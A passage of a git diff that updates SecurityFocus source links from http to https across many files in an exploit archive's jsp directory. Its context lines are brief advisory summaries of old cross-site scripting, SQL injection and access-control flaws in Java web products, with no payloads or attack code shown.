b/exploits/jsp/remote/21355.txt index 46e9ece9b..f88e4a80b 100644 --- a/exploits/jsp/remote/21355.txt +++ b/exploits/jsp/remote/21355.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4372/info +source: https://www.securityfocus.com/bid/4372/info Citrix NFuse is an application portal server meant to provide the functionality of any application on the server via a web browser. NFuse works in conjunction with a previously-installed webserver. NFuse is said to support almost any operating system, including Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/jsp/webapps/21621.txt b/exploits/jsp/webapps/21621.txt index e6b2c8a7d..c39e86ff7 100644 --- a/exploits/jsp/webapps/21621.txt +++ b/exploits/jsp/webapps/21621.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5249/info +source: https://www.securityfocus.com/bid/5249/info Macromedia Sitespring is a J2EE-compliant product for managing website production. The Macromedia Sitespring server runs on Microsoft Windows operating systems. diff --git a/exploits/jsp/webapps/21875.txt b/exploits/jsp/webapps/21875.txt index 11214ffba..2ac987c58 100644 --- a/exploits/jsp/webapps/21875.txt +++ b/exploits/jsp/webapps/21875.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5821/info +source: https://www.securityfocus.com/bid/5821/info Jetty is a freely available, open source Java Web Server and Servlet Container. It is available for Linux, Unix, and Microsoft Windows platforms. diff --git a/exploits/jsp/webapps/22805.txt b/exploits/jsp/webapps/22805.txt index 132359c48..6e30aa9ff 100644 --- a/exploits/jsp/webapps/22805.txt +++ b/exploits/jsp/webapps/22805.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7969/info +source: https://www.securityfocus.com/bid/7969/info Reportedly, Tmax Soft JEUS is vulnerable to a cross site-scripting attack. The vulnerability is present in the url.jsp script of the Tmax Soft JEUS server. diff --git a/exploits/jsp/webapps/22849.txt b/exploits/jsp/webapps/22849.txt index 9a3fb4891..f48ddb012 100644 --- a/exploits/jsp/webapps/22849.txt +++ b/exploits/jsp/webapps/22849.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8073/info +source: https://www.securityfocus.com/bid/8073/info It has been reported that Verity K2 Toolkit does not sufficiently filter user-supplied search parameters. diff --git a/exploits/jsp/webapps/22857.txt b/exploits/jsp/webapps/22857.txt index 5ad3f0e50..0afa2ed5d 100644 --- a/exploits/jsp/webapps/22857.txt +++ b/exploits/jsp/webapps/22857.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8074/info +source: https://www.securityfocus.com/bid/8074/info It has been reported that the K2 Toolkit does not sufficiently sanitize input by users. Because of this, it may be possible for an attacker to launch an attack that results in the execution of hostile HTML or script code in the browsers of users that have loaded a malicious link created by the attacker. diff --git a/exploits/jsp/webapps/23262.txt b/exploits/jsp/webapps/23262.txt index f00cfbc2d..3f1a9af3b 100644 --- a/exploits/jsp/webapps/23262.txt +++ b/exploits/jsp/webapps/23262.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8852/info +source: https://www.securityfocus.com/bid/8852/info It has been reported that Caucho Resin is prone to multiple HTML Injection and cross-site scripting vulnerabilities in various scripts that may allow a remote attacker to cause hostile HTML or script code to be rendered in the browser of a user who follows a malicious link supplied by the attacker. diff --git a/exploits/jsp/webapps/23315.txt b/exploits/jsp/webapps/23315.txt index 85837ca61..0721cc362 100644 --- a/exploits/jsp/webapps/23315.txt +++ b/exploits/jsp/webapps/23315.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8938/info +source: https://www.securityfocus.com/bid/8938/info It has been reported that BEA WebLogic InteractiveQuery.jsp example application is prone to a cross-site scripting vulnerability. The issue is reported to exist due insufficient sanitization of user-supplied data in an initialization argument called 'person'. It has been reported that if an invalid value is passed to this argument, the software returns the value back to the user in a results page without proper sanitization. The problem may allow a remote attacker to execute HTML or script code in the browser of a user following a malicious link created by an attacker. diff --git a/exploits/jsp/webapps/23402.txt b/exploits/jsp/webapps/23402.txt index 4d3af6739..284582c1b 100644 --- a/exploits/jsp/webapps/23402.txt +++ b/exploits/jsp/webapps/23402.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9112/info +source: https://www.securityfocus.com/bid/9112/info A number of cross-site scripting vulnerabilities have been reported for Macromedia Jrun, specifically in the administrative interface. The problem is said to occur due to insufficient sanitization of URI parameters that may be passed to the page by an unauthenticated user. diff --git a/exploits/jsp/webapps/23872.txt b/exploits/jsp/webapps/23872.txt index 9eb484eb6..0022480f6 100644 --- a/exploits/jsp/webapps/23872.txt +++ b/exploits/jsp/webapps/23872.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9951/info +source: https://www.securityfocus.com/bid/9951/info It has been reported that ReGet may be prone to a directory traversal vulnerability that may allow remote attackers to upload files to arbitrary locations on a target system. The attacker may supply encoded directory traversal sequences in the URI parameter so that the requested file is saved outside of the default download directory specified by the user. diff --git a/exploits/jsp/webapps/24139.txt b/exploits/jsp/webapps/24139.txt index 9dbd6c894..0759667ec 100644 --- a/exploits/jsp/webapps/24139.txt +++ b/exploits/jsp/webapps/24139.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10402/info +source: https://www.securityfocus.com/bid/10402/info It has been reported that Liferay Enterprise Portal is susceptible to multiple cross-site scripting and HTML injection vulnerabilities. User-supplied data from many input fields is included in server generated content without appropriate validation/encoding. This may allow for typical cross-site scripting attacks against other users of the portal. diff --git a/exploits/jsp/webapps/24773.txt b/exploits/jsp/webapps/24773.txt index fad47a3ea..a7f0a23f9 100644 --- a/exploits/jsp/webapps/24773.txt +++ b/exploits/jsp/webapps/24773.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11746/info +source: https://www.securityfocus.com/bid/11746/info It is reported that JSPWiki is susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input prior to including it in dynamically generated Web pages. diff --git a/exploits/jsp/webapps/25159.txt b/exploits/jsp/webapps/25159.txt index 39390a38e..3d54b5b2c 100644 --- a/exploits/jsp/webapps/25159.txt +++ b/exploits/jsp/webapps/25159.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12649/info +source: https://www.securityfocus.com/bid/12649/info Cyclades AlterPath Manager is a network device designed to facilitate remote administration of all network-accessible infrastructure resources. diff --git a/exploits/jsp/webapps/25198.txt b/exploits/jsp/webapps/25198.txt index 88c94b221..f844e7659 100644 --- a/exploits/jsp/webapps/25198.txt +++ b/exploits/jsp/webapps/25198.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12752/info +source: https://www.securityfocus.com/bid/12752/info Participate Enterprise is reported prone to multiple access validation vulnerabilities. These issues may allow remote attackers to disclose sensitive information and corrupt and delete data that can ultimately lead to a denial of service condition. diff --git a/exploits/jsp/webapps/25269.txt b/exploits/jsp/webapps/25269.txt index 37c46d9eb..cfdce8113 100644 --- a/exploits/jsp/webapps/25269.txt +++ b/exploits/jsp/webapps/25269.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12892/info +source: https://www.securityfocus.com/bid/12892/info Multiple remote cross-site scripting vulnerabilities affect Oracle Reports Server. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/jsp/webapps/25628.txt b/exploits/jsp/webapps/25628.txt index 64d643157..7fe0ca955 100644 --- a/exploits/jsp/webapps/25628.txt +++ b/exploits/jsp/webapps/25628.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13545/info +source: https://www.securityfocus.com/bid/13545/info The phpbb vendor reports that a critical vulnerability exists in the BBCode handling routines of the 'bbcode.php' script. diff --git a/exploits/jsp/webapps/25685.txt b/exploits/jsp/webapps/25685.txt index fc90b51c6..893a1047e 100644 --- a/exploits/jsp/webapps/25685.txt +++ b/exploits/jsp/webapps/25685.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13683/info +source: https://www.securityfocus.com/bid/13683/info The MimeMessage method in the Sun JavaMail API does not perform sufficient validation on message number values that are passed to the method during requests. An attacker that can successfully authenticate to an email server implementation that is written using the Sun JavaMail API, may exploit this issue to make requests for arbitrary email messages that are stored on the server. diff --git a/exploits/jsp/webapps/25738.txt b/exploits/jsp/webapps/25738.txt index 1964c7795..056d95537 100644 --- a/exploits/jsp/webapps/25738.txt +++ b/exploits/jsp/webapps/25738.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13793/info +source: https://www.securityfocus.com/bid/13793/info BEA WebLogic Server And WebLogic Express are affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'LoginForm.jsp' script. diff --git a/exploits/jsp/webapps/25739.txt b/exploits/jsp/webapps/25739.txt index 8faece2dc..50cd4b4f2 100644 --- a/exploits/jsp/webapps/25739.txt +++ b/exploits/jsp/webapps/25739.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13794/info +source: https://www.securityfocus.com/bid/13794/info BEA WebLogic Server And WebLogic Express are affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the error page. diff --git a/exploits/jsp/webapps/25946.txt b/exploits/jsp/webapps/25946.txt index 1bc8fccfc..a2f75e5e2 100644 --- a/exploits/jsp/webapps/25946.txt +++ b/exploits/jsp/webapps/25946.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14167/info +source: https://www.securityfocus.com/bid/14167/info McAfee IntruShield Security Management System is susceptible to multiple vulnerabilities. diff --git a/exploits/jsp/webapps/26354.txt b/exploits/jsp/webapps/26354.txt index 9a670e750..febf28108 100644 --- a/exploits/jsp/webapps/26354.txt +++ b/exploits/jsp/webapps/26354.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15127/info +source: https://www.securityfocus.com/bid/15127/info NetFlow Analyzer 4 is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/26532.txt b/exploits/jsp/webapps/26532.txt index 04c9144ef..076064608 100644 --- a/exploits/jsp/webapps/26532.txt +++ b/exploits/jsp/webapps/26532.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15481/info +source: https://www.securityfocus.com/bid/15481/info Revize CMS is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/jsp/webapps/26533.txt b/exploits/jsp/webapps/26533.txt index bdfae0ed3..d1159b63e 100644 --- a/exploits/jsp/webapps/26533.txt +++ b/exploits/jsp/webapps/26533.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15482/info +source: https://www.securityfocus.com/bid/15482/info Revize CMS is prone to an information disclosure vulnerability. This issue is due to a failure in the application to restrict access to sensitive files. diff --git a/exploits/jsp/webapps/26534.txt b/exploits/jsp/webapps/26534.txt index 84bc6323a..3626f1e4b 100644 --- a/exploits/jsp/webapps/26534.txt +++ b/exploits/jsp/webapps/26534.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15484/info +source: https://www.securityfocus.com/bid/15484/info Revize CMS is prone to a cross-site scripting vulnerabilities. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/jsp/webapps/26700.txt b/exploits/jsp/webapps/26700.txt index e19c6f30f..e8d9a7444 100644 --- a/exploits/jsp/webapps/26700.txt +++ b/exploits/jsp/webapps/26700.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15687/info +source: https://www.securityfocus.com/bid/15687/info Java Search Engine is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/26778.txt b/exploits/jsp/webapps/26778.txt index c57b0a90f..75a6b6448 100644 --- a/exploits/jsp/webapps/26778.txt +++ b/exploits/jsp/webapps/26778.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15814/info +source: https://www.securityfocus.com/bid/15814/info Blackboard Academic Suite is prone to a cross-domain frameset-loading vulnerability. diff --git a/exploits/jsp/webapps/26924.txt b/exploits/jsp/webapps/26924.txt index a293e9ac2..e2eeec14b 100644 --- a/exploits/jsp/webapps/26924.txt +++ b/exploits/jsp/webapps/26924.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16004/info +source: https://www.securityfocus.com/bid/16004/info OpenEdit is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/26972.txt b/exploits/jsp/webapps/26972.txt index 443250a4d..1a2aa9e0f 100644 --- a/exploits/jsp/webapps/26972.txt +++ b/exploits/jsp/webapps/26972.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16048/info +source: https://www.securityfocus.com/bid/16048/info Oracle Application Server Discussion Forum Portlet is affected by multiple remote vulnerabilities. diff --git a/exploits/jsp/webapps/27463.txt b/exploits/jsp/webapps/27463.txt index 1a10f734c..5a87b598f 100644 --- a/exploits/jsp/webapps/27463.txt +++ b/exploits/jsp/webapps/27463.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17210/info +source: https://www.securityfocus.com/bid/17210/info IBM Tivoli Business Systems Manager is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/27558.txt b/exploits/jsp/webapps/27558.txt index 783715353..6921299fe 100644 --- a/exploits/jsp/webapps/27558.txt +++ b/exploits/jsp/webapps/27558.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17351/info +source: https://www.securityfocus.com/bid/17351/info Bugzero is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/27559.txt b/exploits/jsp/webapps/27559.txt index 001128d46..d6d047f5e 100644 --- a/exploits/jsp/webapps/27559.txt +++ b/exploits/jsp/webapps/27559.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17351/info +source: https://www.securityfocus.com/bid/17351/info Bugzero is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/27684.txt b/exploits/jsp/webapps/27684.txt index d70080fa2..1a7607d99 100644 --- a/exploits/jsp/webapps/27684.txt +++ b/exploits/jsp/webapps/27684.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17604/info +source: https://www.securityfocus.com/bid/17604/info CiscoWorks Wireless LAN Solution Engine (WLSE) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/28278.txt b/exploits/jsp/webapps/28278.txt index d500f7741..2677c6f94 100644 --- a/exploits/jsp/webapps/28278.txt +++ b/exploits/jsp/webapps/28278.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19174/info +source: https://www.securityfocus.com/bid/19174/info OpenCMS is prone to multiple unauthorized-access vulnerabilities because it fails to properly authenticate users when performing administrative tasks. diff --git a/exploits/jsp/webapps/28605.txt b/exploits/jsp/webapps/28605.txt index 079a4f0e1..e1340716b 100644 --- a/exploits/jsp/webapps/28605.txt +++ b/exploits/jsp/webapps/28605.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20109/info +source: https://www.securityfocus.com/bid/20109/info Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include: diff --git a/exploits/jsp/webapps/28606.txt b/exploits/jsp/webapps/28606.txt index 01c6732aa..cfc8a2f55 100644 --- a/exploits/jsp/webapps/28606.txt +++ b/exploits/jsp/webapps/28606.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20109/info +source: https://www.securityfocus.com/bid/20109/info Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include: diff --git a/exploits/jsp/webapps/28607.txt b/exploits/jsp/webapps/28607.txt index 8eb7cdae5..a23c93f99 100644 --- a/exploits/jsp/webapps/28607.txt +++ b/exploits/jsp/webapps/28607.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20109/info +source: https://www.securityfocus.com/bid/20109/info Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include: diff --git a/exploits/jsp/webapps/28608.txt b/exploits/jsp/webapps/28608.txt index 6e6908dc7..377209c81 100644 --- a/exploits/jsp/webapps/28608.txt +++ b/exploits/jsp/webapps/28608.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20109/info +source: https://www.securityfocus.com/bid/20109/info Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include: diff --git a/exploits/jsp/webapps/28609.txt b/exploits/jsp/webapps/28609.txt index a3b910900..9bb9c45fa 100644 --- a/exploits/jsp/webapps/28609.txt +++ b/exploits/jsp/webapps/28609.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20109/info +source: https://www.securityfocus.com/bid/20109/info Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include: diff --git a/exploits/jsp/webapps/28610.txt b/exploits/jsp/webapps/28610.txt index 38edd9a56..0aebe0f72 100644 --- a/exploits/jsp/webapps/28610.txt +++ b/exploits/jsp/webapps/28610.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20109/info +source: https://www.securityfocus.com/bid/20109/info Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include: diff --git a/exploits/jsp/webapps/29301.txt b/exploits/jsp/webapps/29301.txt index 4f7a211be..7ba15502e 100644 --- a/exploits/jsp/webapps/29301.txt +++ b/exploits/jsp/webapps/29301.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21686/info +source: https://www.securityfocus.com/bid/21686/info Oracle Portal is prone to multiple HTTP response-splitting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/29576.txt b/exploits/jsp/webapps/29576.txt index 3a87ad602..7dbe4b7dd 100644 --- a/exploits/jsp/webapps/29576.txt +++ b/exploits/jsp/webapps/29576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22503/info +source: https://www.securityfocus.com/bid/22503/info Atlassian JIRA is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/29811.txt b/exploits/jsp/webapps/29811.txt index c600887b7..8211cab57 100644 --- a/exploits/jsp/webapps/29811.txt +++ b/exploits/jsp/webapps/29811.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23244/info +source: https://www.securityfocus.com/bid/23244/info Atlassian JIRA is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30189.txt b/exploits/jsp/webapps/30189.txt index ddc400f3c..7fe0c30e5 100644 --- a/exploits/jsp/webapps/30189.txt +++ b/exploits/jsp/webapps/30189.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24476/info +source: https://www.securityfocus.com/bid/24476/info Apache Tomcat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30191.txt b/exploits/jsp/webapps/30191.txt index bcd0a33f9..c350bb33a 100644 --- a/exploits/jsp/webapps/30191.txt +++ b/exploits/jsp/webapps/30191.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24480/info +source: https://www.securityfocus.com/bid/24480/info Apache Tomahawk MyFaces JSF Framework is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30266.txt b/exploits/jsp/webapps/30266.txt index 54b2f7fff..715e0aaf7 100644 --- a/exploits/jsp/webapps/30266.txt +++ b/exploits/jsp/webapps/30266.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24766/info +source: https://www.securityfocus.com/bid/24766/info NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30267.txt b/exploits/jsp/webapps/30267.txt index 70c205b33..f1f9f8876 100644 --- a/exploits/jsp/webapps/30267.txt +++ b/exploits/jsp/webapps/30267.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24766/info +source: https://www.securityfocus.com/bid/24766/info NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30268.txt b/exploits/jsp/webapps/30268.txt index 0fba4bfe6..6a2e11bd9 100644 --- a/exploits/jsp/webapps/30268.txt +++ b/exploits/jsp/webapps/30268.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24766/info +source: https://www.securityfocus.com/bid/24766/info NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30269.txt b/exploits/jsp/webapps/30269.txt index 4835829de..c0c1df0d2 100644 --- a/exploits/jsp/webapps/30269.txt +++ b/exploits/jsp/webapps/30269.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24766/info +source: https://www.securityfocus.com/bid/24766/info NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30270.txt b/exploits/jsp/webapps/30270.txt index d4b2b4291..a2adf6704 100644 --- a/exploits/jsp/webapps/30270.txt +++ b/exploits/jsp/webapps/30270.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24766/info +source: https://www.securityfocus.com/bid/24766/info NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30563.txt b/exploits/jsp/webapps/30563.txt index 07caa8367..597f02113 100644 --- a/exploits/jsp/webapps/30563.txt +++ b/exploits/jsp/webapps/30563.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25531/info +source: https://www.securityfocus.com/bid/25531/info Apache Tomcat is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30608.txt b/exploits/jsp/webapps/30608.txt index 21e3fef2f..29424e54c 100644 --- a/exploits/jsp/webapps/30608.txt +++ b/exploits/jsp/webapps/30608.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25803/info +source: https://www.securityfocus.com/bid/25803/info JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30609.txt b/exploits/jsp/webapps/30609.txt index 393a9dc7c..7d13a2a35 100644 --- a/exploits/jsp/webapps/30609.txt +++ b/exploits/jsp/webapps/30609.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25803/info +source: https://www.securityfocus.com/bid/25803/info JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30610.txt b/exploits/jsp/webapps/30610.txt index bbb4155e7..28a71ddbc 100644 --- a/exploits/jsp/webapps/30610.txt +++ b/exploits/jsp/webapps/30610.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25803/info +source: https://www.securityfocus.com/bid/25803/info JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30611.txt b/exploits/jsp/webapps/30611.txt index 997b1f732..8d1d687c2 100644 --- a/exploits/jsp/webapps/30611.txt +++ b/exploits/jsp/webapps/30611.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25803/info +source: https://www.securityfocus.com/bid/25803/info JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30612.txt b/exploits/jsp/webapps/30612.txt index 1288a0eb8..bef252d5b 100644 --- a/exploits/jsp/webapps/30612.txt +++ b/exploits/jsp/webapps/30612.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25803/info +source: https://www.securityfocus.com/bid/25803/info JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30613.txt b/exploits/jsp/webapps/30613.txt index c5fb044b2..91e01d57f 100644 --- a/exploits/jsp/webapps/30613.txt +++ b/exploits/jsp/webapps/30613.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25803/info +source: https://www.securityfocus.com/bid/25803/info JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30675.txt b/exploits/jsp/webapps/30675.txt index 447e4bf03..273234739 100644 --- a/exploits/jsp/webapps/30675.txt +++ b/exploits/jsp/webapps/30675.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26084/info +source: https://www.securityfocus.com/bid/26084/info InnovaShop is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30676.txt b/exploits/jsp/webapps/30676.txt index 8ee15e4fb..870e27d6e 100644 --- a/exploits/jsp/webapps/30676.txt +++ b/exploits/jsp/webapps/30676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26084/info +source: https://www.securityfocus.com/bid/26084/info InnovaShop is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30704.txt b/exploits/jsp/webapps/30704.txt index f672edcde..8a1be31d6 100644 --- a/exploits/jsp/webapps/30704.txt +++ b/exploits/jsp/webapps/30704.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26182/info +source: https://www.securityfocus.com/bid/26182/info GHBoard is prone to multiple vulnerabilities that let attackers upload and download arbitrary files and execute arbitrary code within the context of the webserver process. diff --git a/exploits/jsp/webapps/30705.txt b/exploits/jsp/webapps/30705.txt index 60ae83e31..26903cdcb 100644 --- a/exploits/jsp/webapps/30705.txt +++ b/exploits/jsp/webapps/30705.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26182/info +source: https://www.securityfocus.com/bid/26182/info GHBoard is prone to multiple vulnerabilities that let attackers upload and download arbitrary files and execute arbitrary code within the context of the webserver process. diff --git a/exploits/jsp/webapps/31004.txt b/exploits/jsp/webapps/31004.txt index ebcd81903..4625c4974 100644 --- a/exploits/jsp/webapps/31004.txt +++ b/exploits/jsp/webapps/31004.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27214/info +source: https://www.securityfocus.com/bid/27214/info Sun Java System Identity Manager is prone to multiple input-validation vulnerabilities, including an HTML-injection issue and cross-site scripting issues, because it fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/31005.txt b/exploits/jsp/webapps/31005.txt index d01ba7111..72bfddba2 100644 --- a/exploits/jsp/webapps/31005.txt +++ b/exploits/jsp/webapps/31005.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27214/info +source: https://www.securityfocus.com/bid/27214/info Sun Java System Identity Manager is prone to multiple input-validation vulnerabilities, including an HTML-injection issue and cross-site scripting issues, because it fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/31006.txt b/exploits/jsp/webapps/31006.txt index a761abba6..56dff9a2a 100644 --- a/exploits/jsp/webapps/31006.txt +++ b/exploits/jsp/webapps/31006.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27214/info +source: https://www.securityfocus.com/bid/27214/info Sun Java System Identity Manager is prone to multiple input-validation vulnerabilities, including an HTML-injection issue and cross-site scripting issues, because it fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/31007.txt b/exploits/jsp/webapps/31007.txt index b83dc8bad..b0dfa8789 100644 --- a/exploits/jsp/webapps/31007.txt +++ b/exploits/jsp/webapps/31007.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27214/info +source: https://www.securityfocus.com/bid/27214/info Sun Java System Identity Manager is prone to multiple input-validation vulnerabilities, including an HTML-injection issue and cross-site scripting issues, because it fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/31299.txt b/exploits/jsp/webapps/31299.txt index db5730c0d..dad137ed1 100644 --- a/exploits/jsp/webapps/31299.txt +++ b/exploits/jsp/webapps/31299.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27986/info +source: https://www.securityfocus.com/bid/27986/info Alkacon OpenCms is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/31445.txt b/exploits/jsp/webapps/31445.txt index 3d8e31e73..2c97437c5 100644 --- a/exploits/jsp/webapps/31445.txt +++ b/exploits/jsp/webapps/31445.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28352/info +source: https://www.securityfocus.com/bid/28352/info Elastic Path is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/31446.txt b/exploits/jsp/webapps/31446.txt index 6554282fb..4d3cf46bc 100644 --- a/exploits/jsp/webapps/31446.txt +++ b/exploits/jsp/webapps/31446.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28352/info +source: https://www.securityfocus.com/bid/28352/info Elastic Path is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied 